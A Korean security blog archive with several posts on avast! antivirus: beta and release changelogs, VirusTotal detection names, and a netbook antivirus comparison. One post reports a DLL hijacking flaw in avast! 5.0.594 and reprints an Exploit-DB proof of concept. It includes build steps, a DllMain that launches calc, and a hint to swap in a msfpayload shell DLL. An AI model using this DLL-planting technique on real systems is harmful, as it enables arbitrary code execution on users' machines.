어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

•무료 제품: http://files.avast.com/files/beta/5.0.656/setup_av_free.exe
• 프로 제품: http://files.avast.com/files/beta/5.0.656/setup_av_pro.exe
• 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.656/setup_ais.exe

기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.


어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

• 어베스트! 서비스가 사자리는 문제점 해결
• 행동방어: 안정성 문제 해결(aswSP.sys)
• 어베스트! 샌드박스에서 안정서 및 성능 향상
• 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
• 업데이트 속도 향상
• IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
• IS: 새로운 안티스팸 엔진으로 업그레이드
• GUI에서 일부 사항 변경 및 버그 수정
• 스크린 리더 지원 향상
• 언어 추가:  덴마크어, 헤브류어


출 처: http://forum.avast.com/index.php?topic=63151.0

감사합니다.


PS: 최근 발견된 DLL Hijacking 취약점에 대해서는 아직 언급되지 않은 상태입니다.

끝.
reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    댓글을 달아 주세요

    최근 보안 아니 윈도우 업계를 강타하고 있는 취약점이 바로 DLL Hijacking입니다. DLL은 윈도우 실행파일이 참조하는 라이브러리 파일인데, 문제는 DLL 파일의 경로를 제대로 검증하지 않아 이를 통해 공격을 하는 형태로 이미 예전부터 예견되어 있던 취약점입니다.

    DLL Hijacking 취약점에 대한 자세한 사항은 아래 링크를 참고하시면 금방 이해가 되실 것으로 생각됩니다.


    하여튼, 어베스트! 안티바이러스 제품의 최신 버전에서도 DLL Hijacking 취약점을 가지고 있는 것으로 알려져 있습니다. 어베스트!의 최신 버전은 V5.0.594이며, mfc90loc.dll 파일에서 이 취약점이 존재합니다. mfc90loc.dll은 라이선스 파일에 관련된 DLL 입니다.

    # Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
    # Date: 25/08/2010
    # Author: Bruno Filipe (diwr) http://digitalacropolis.us
    # Software Link: http://www.avast.com <http://www.bsplayer.org>
    # Version: <= 5.0.594
    # Tested on: WinXP SP2, WinXP SP3
    # Thx TheLeader ;)
    #
    ----------------------------------------------------------------------------------------------------------
    # This should work with avast license files (.avastlic)
    # 1. gcc dllmain.c -o mfc90loc.dll
    # 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
    anything.avastlic)
    # 3. You can generate a msfpayload DLL and spawn a shell, for example.
    #
    ----------------------------------------------------------------------------------------------------------

    #include <windows.h>

    int main()
    {
    WinExec("calc", SW_NORMAL);
    exit(0);
    return 0;
    }

    BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
    {
    main();
    return 0;
    }

    하지만 실제적으로 어베스트!에서는 실시간 감시 및 자기 보호 기능이 월등하기 때문에 이 취약점을 직접적으로 이용하여 공격하기에는 약간 어려운 부분이 있을 수 있습니다만, 그래도 어베스트! 제작사의 빠른 대응이 필요한 시점으로 보입니다.

    감사합니다.

    출처: http://www.exploit-db.com/exploits/14743/


    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus

      댓글을 달아 주세요

      어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

      이번에 발표하는 정식 버전은 V5.0.590 베타 버전의 뒤를 이은 것으로 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다.

      어베스트! V5.0.594 정식에서 개선되거나 추가된 기능은 다음과 같습니다.

      • 윈도우 시스템 복원 내에 VPS가 손상된 경우에는 자동 복구 기능 추가
      • 자기 보호(aswSP.sys): 안정성 문제 해결
      • 활성화 코드 기능 추가
      • 어베스트! 샌드박스 기능 향상
      • 행동 방어 성능 향상
      • 윈도우 비스타 64비트 버전에서 어베스트! 화면 보호기 지원 및 느려지는 문제점 해결
      • 네트워크 모듈(aswTdi.sys)의 안정성 향상 - AVG 제품과의 호환성 문제 해결
      • 인터넷 시큐리티 방화벽: BSOD가 발생할 수 있는 잠재적인 문제점 해결
      • GUI에서 문제점 수정
      • 언어 추가: 카탈로니아어, 벨라루스어

      출 처: http://forum.avast.com/index.php?topic=61230.0

      감사합니다.

      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus

        댓글을 달아 주세요

        어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

        이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

        • 무료 제품: http://files.avast.com/files/beta/5.0.590/setup_av_free.exe
        • 프로 제품: http://files.avast.com/files/beta/5.0.590/setup_av_pro.exe
        • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.590/setup_ais.exe

        기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 베타였던 V5.0.545를 설치하여 사용중이라도 업데이트할 수 있습니다.


        어베스트! V5.0.590 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

        • 전체 검사 시에 간헐적으로 멈추는 문제점 해결
        • 서비스에 대한 로그 기능 추가(잠재적인 서비스 멈춤 문제를 디버깅하는데 유용)
        • 언어 추가: 루마니아어(미완성)


        어베스트! V5.0.584 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

        • 윈도우 시스템 복원 내에 VPS가 손상된 경우에는 자동 복구 기능 추가
        • 자기 보호(aswSP.sys): 안정성 문제 해결
        • 라이선스 파일 등록시 발생하는 사소한 문제 해결
        • 활성화 코드 기능 추가
        • 어베스트! 샌드박스 기능 향상
        • 행동 방어 성능 향상
        • 윈도우 비스타 64비트 버전에서 어베스트! 화면 보호기 지원
        • 네트워크 모듈(aswTdi.sys)의 안정성 향상 - AVG 제품과의 호환성 문제 해결
        • 인터넷 시큐리티 방화벽: BSOD가 발생할 수 있는 잠재적인 문제점 해결
        • GUI에서 문제점 수정
        • 언어 추가: 카탈로니아어, 벨라루스어

        출 처: http://forum.avast.com/index.php?topic=61045.0

        감사합니다.

        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus

          댓글을 달아 주세요

          어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

          이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

          •무료 제품: http://files.avast.com/files/beta/5.0.584/setup_av_free.exe
          • 프로 제품: http://files.avast.com/files/beta/5.0.584/setup_av_pro.exe
          • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.584/setup_ais.exe

          기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 버전인 V5.0.545를 설치하여 사용중이라도 업데이트할 수 있습니다.


          어베스트! V5.0.584 베타에서 개선되거나 추가된 기능은 다음과 같습니다.


          • 윈도우 시스템 복원 내에 VPS가 손상된 경우에는 자동 복구 기능 추가
          • 자기 보호(aswSP.sys): 안정성 문제 해결
          • 라이선스 파일 등록시 발생하는 사소한 문제 해결
          • 활성화 코드 기능 추가
          • 어베스트! 샌드박스 기능 향상
          • 행동 방어 성능 향상
          • 윈도우 비스타 64비트 버전에서 어베스트! 화면 보호기 지원
          • 네트워크 모듈(aswTdi.sys)의 안정성 향상 - AVG 제품과의 호환성 문제 해결
          • 인터넷 시큐리티 방화벽: BSOD가 발생할 수 있는 잠재적인 문제점 해결
          • GUI에서 문제점 수정
          • 언어 추가: 카탈로니아어, 벨라루스어

          출 처: http://forum.avast.com/index.php?topic=61045.0

          감사합니다.

          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus

            댓글을 달아 주세요

            바이러스토탈(http://www.virustotal.com)은 파일(또는 URL)에 악성 프로그램이 포함되어 있는지 진단해 주는 사이트로, 다양한 안티바이러스 엔진에서 순차적으로 검사를 진행합니다.

            따라서, 최신 악성 프로그램의 경우에는 한두가지 제품에서만 (초기에) 진단하는 경우가 많으므로, 다양한 백신의 분석을 검토하여 악성 여부를 사용자가 가늠할 수 있습니다.

            바이러스토탈에는 어베스트! 엔진이 4와 5두가지로 나눠서 제공됩니다. 악성 프로그램을 보통 검사해 보면 거의 대부분 동일한 진단을 하게 되지만, 다음과 같은 진단명은 어베스트! V5 버전에서만 볼 수 있습니다.

            • Win32:Packed - 실행 압축(SFX) 형식으로 감염된 파일
            • Win32:SuspBehav - 의심스러운 행동을 하는 파일

            어베스트! V4 엔진의 가장 큰 오진의 원인은 바로 실행 압축(executable archive)을 악성 프로그램으로 진단하는 것이었습니다. 그 이유는 일반적으로 악성 프로그램이 분석을 막기 위해 프로그램의 헤더를 압축하고, 헤더값을 일부 변조하여 압축을 해제할 수 없게 하는 경우가 많았기 때문입니다. 어베스트! V5에서는 이러한 문제를 해결하기 위해 추가적인 기능을 채택하였습니다.

            Win32:SuspBehav는 어베스트! V5에 포함된 루트킷 탐지 기술과 가상화(sandbox)를 통해 진단하는 경우에 나타날 수 있으며, 어베스트! V4에서는 이 진단명이 존재하지 않습니다.

            감사합니다.

             






            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus

              댓글을 달아 주세요

              안티바이러스 제품은 실시간 감시 기능이 제공되기 때문에 설치하지 않은 상태보다 컴퓨터의 속도가 약간 느려지고, 메모리 등 자원을 소모하게 됩니다.

              최근 1-2년전부터 간단한 웹서핑 등의 용도로 널리 사용되는 넷북(Netbook)은 상대적으로 느린 CPU를 장착하게 되므로 안티바이러스와 같은 제품을 선택할 때에 종종 고민을 하게 됩니다.

              물론 인텔은 넷북에 적합한 Atom CPU를 출시하고 있으며, 최근에는 듀얼코어인 N550 모델까지 출시할 예정이며, 기존에 구매한 경우에는 N450, N470이 장착되어 있을 것입니다.

              독일의 유명한 컴퓨터 관련 사이트인 C't magazin에서는 넷북에 적합한 안티바이러스 제품을 선정하여 그 결과를 발표했습니다. 먼저 평가에 참여한 제품은 다음과 같습니다.

              • avast! Free Antivirus
              • AVG Anti-Virus Free Edition
              • Avira AntiVir Personal
              • Comodo Antivirus Free
              • Microsoft Security Essentials
              • Panda Cloud Antivirus
              • Rising Antivirus 2010

              평가 결과 넷북에서 현저한 속도 저하 없이 사용할 수 있는 보안 제품은 avast!, Avira, Panda 제품 3가지가 선정되었습니다. 이 중 avast!는 웹 필터링이 포함된 가장 적합한 제품으로 선정되었습니다.

              일반적으로 무료 백신의 단점으로는 '느린 업데이트 주기'를 들 수 있습니다. 하지만, avast!는 상용제품, 무료 제품 모두 동일한 업데이트 주기를 지원하여 상대적으로 월등한 제품입니다.

              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus

                댓글을 달아 주세요

                주: 본 버전에서는 V5.0.533 버전의 수정판이며, 추가적인 내용은 없습니다.

                어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

                이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

                •무료 제품: http://files.avast.com/files/beta/5.0.542/setup_av_free.exe
                • 프로 제품: http://files.avast.com/files/beta/5.0.542/setup_av_pro.exe
                • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.542/setup_ais.exe

                기 존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 베타였던 V5.0.542를 설치하여 사용중이라도 업데이트할 수 있습니다.


                어베스트! V5.0.533 베타에서 개선되거나 추가된 기능은 다음과 같습니다.


                • 오진 접수 시스템에 관련된 문제점 해결
                • 행동기반 방어(Behavior Shield)의 루트킷 탐지 부분의 성능 향상
                • 샌드박스: 많은 기능 추가, 안정성 및 성능 향상
                • 방화벽: VPN 호환성 문제 해결(Public zone에서도 정상적으로 동작함)
                • 방화벽: afwServ.exe 프로세스가 중단/충돌하는 문제점 해결
                • 스크린 리더와의 호환성 향상
                • 아웃룩 안티스팸 애드인의 다양한 문제점 해결
                • 오른쪽에서 왼쪽 인터페이스 지원
                • 언어 추가: 아라비아어, 크로아티아어

                출 처: http://forum.avast.com/index.php?topic=59223.0

                감 사합니다.
                reTweet
                Posted by 문스랩닷컴
                blog comments powered by Disqus

                  댓글을 달아 주세요

                  오늘 어베스트!의 최신 버전인 V5.0.507이 정식으로 출시되었습니다. 기존 베타에서 발생했던 다양한 문제를 해결한 것으로 자세한 사항은 아래와 같습니다.

                • 검사 및 바이러스 안전지대 기능 향상 - 윈도우 안전모드에서도 사용 가능.
                • aswSP.sys - 보호되는 핸들이 중복되는 문제점을 해결하여 안정성 문제 해결.
                • 프로 AV/IS 제품 - FAT32 파티션에서 발생하던 파일 관련 문제점 해결
                • 다양한 Winsock LSP 지원으로 호환성 향상
                • 어베스트! 샌드박스(가상화)의 성능 향상
                • 감염된 파일의 치료 기능 향상
                • 시력이 약한 사용자를 위한 화면 읽기 프로그램과의 호환성 추가
                • V4.8 버전에서 업그레이드한 경우 바이러스 안전지대에 있던 시스템 파일 제거
                • IS 방화벽 - 윈도우 XP에서 VPN 연결에 관련된 문제점 해결
                • IS 방화벽 - Xbox360 미디어 공유 기능에 관련된 문제점 해결
                • IS 방화벽 - 논리적인 디스크 할당을 변경할 때 잠재적으로 발생할 수 있는 블루스크린(BSOD) 문제점 해결
                • IS 방화벽 - 패킷 정책을 저장할 때 잠재적으로 발생할 수 있는 충돌 문제 해결
                • IS 방화벽 - 인터넷 연결 공유(ICS)에서 발생하는 문제점 해결
                • IS 방화벽 - 윈도우 2000과 호환성 문제 해결
                • IS 방화벽 - 로지텍 데스크탑 매니저와 발생하는 호환성 문제 해결
                • 프로 AV/IS 제품 - PerfiectDisk 11에서 발생하는 호환성 문제 해결
                • 프로 AV/IS 제품 - ashCmd.exe 명령어에서 /@ 매개변수 지원
                • 프로 AV/IS 제품 - 아크로스 트루 이미지와의 호환성 문제 해결
                • 아웃룩의 안티스팸 애드인의 문제점 다수 해결
                • AshUpd.exe 문제점 해결
                • 인스톨 프로그램의 성능 개선 - V4.8 버전에서 업그레이드하는 경우
                • 화면 보호기 메뉴에서 어베스트! 화면 보호기 속성을 구성할 수 있도록 추가
                • GUI의 오류 수정
                • 다양한 언어(포르투칼, 노르웨이, 핀란드, 슬로바니아, 터키어, 베트남어) 추가
                • 출처: http://forum.avast.com/index.php?topic=58539.0

                  감사합니다.

                  reTweet
                  Posted by 문스랩닷컴
                  blog comments powered by Disqus

                    댓글을 달아 주세요

                    어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

                    이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

                    기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 베타였던 V5.0.492를 설치하여 사용중이라도 업데이트할 수 있습니다.


                    어베스트! V5.0.504베타에서 개선되거나 추가된 기능은 다음과 같습니다.

                    • 프로 AV / IS - 아크로니스 트루 이미지 프로그램을 사용할 때 발생하는 호환성 문제 해결
                    • IS 방화벽 - 인터넷 연결 공유(ICS)에서 발생하는 문제점 해결
                    • IS 방화벽 - 로지텍 데스크탑 매니저를 사용할 때 발생하는 호환성 문제 해결
                    • ashUpd.exe 에서 발생하는 문제점 해결
                    • AvastUI.exe에서 발생하는 충돌 문제 해결

                    출처: http://forum.avast.com/index.php?topic=58183.0


                    reTweet
                    Posted by 문스랩닷컴
                    blog comments powered by Disqus

                      댓글을 달아 주세요



                      Web Analytics Blogs Directory